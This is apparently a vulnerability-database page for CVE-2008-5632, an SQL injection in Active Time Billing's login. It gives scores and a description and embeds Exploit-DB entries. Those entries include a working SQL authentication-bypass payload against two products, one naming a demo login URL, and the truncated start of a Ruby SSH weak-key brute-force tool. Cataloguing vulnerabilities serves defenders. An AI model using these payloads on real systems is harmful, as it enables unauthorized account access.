CVE-2008-5632
published 2008-12-17CVE-2008-5632: SQL injection vulnerability in Account.asp in Active Time Billing 3.2 allows remote attackers to execute arbitrary SQL commands via the (1) username and (2)…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.02%
59.1th percentile
SQL injection vulnerability in Account.asp in Active Time Billing 3.2 allows remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters, possibly related to start.asp. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| activewebsoftwares | active_time_billing | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Active Time Billing 3.2 - Authentication Bypass
exploitdb·2008-11-30
CVE-2008-5632 Active Time Billing 3.2 - Authentication Bypass
Active Time Billing 3.2 - Authentication Bypass
---
###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################
#found by : OffensiveTrack
#Author : AlpHaNiX
#website : www.offensivetrack.org
#contact on mail & msn : [email protected]
###########################################################################
#script : Active timebilling
#€xploit : http://www.activewebsoftwares.com/demoactivetimebilling/Account.asp
username: r0' or ' 1=1--
password: r0' or ' 1=1--
#greetz : My Best Friend Zigma
###########################################################################
# milw0rm.com [2008-11-30]
Exploit-DB
Active Force Matrix 2 - Authentication Bypass
exploitdb·2008-11-29
CVE-2008-5634 Active Force Matrix 2 - Authentication Bypass
Active Force Matrix 2 - Authentication Bypass
---
[~] ----------------------------بسم الله الرØÙ…Ù† الرØÙŠÙ…------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor:www.activewebsoftwares.com
[~]Software: Active Force Matrix v 2
[~]author: ((Ñ3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoactiveforcematrix/account.asp
[~]--------------------------------------------------------------------------------
[~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري
[~]
[~] spechial thank
Exploit-DB
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)
exploitdb·2008-05-16
CVE-2008-0166 OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)
OpenSSL 0.9.8c-1
#
# This tool helps to find user accounts with weak SSH keys
# that should be regenerated with an unaffected version
# of openssl.
#
# You will need the precalculated keys provided by HD Moore
# See http://metasploit.com/users/hdm/tools/debian-openssl/
# for further information.
#
# Common Keys:
#
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2)
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
#
#
# Usage:
# debian_openssh_key_test.rb
#
# E-DB Note: See here for an update ~ https://github.com/offensive-security/exploitdb/pull/76/files
#
require 'thread'
THREADCOUNT = 10
KEYSPERCONNECT = 3
queue = Queue.new
thre
No writeups or analysis indexed.
2008-12-17
Published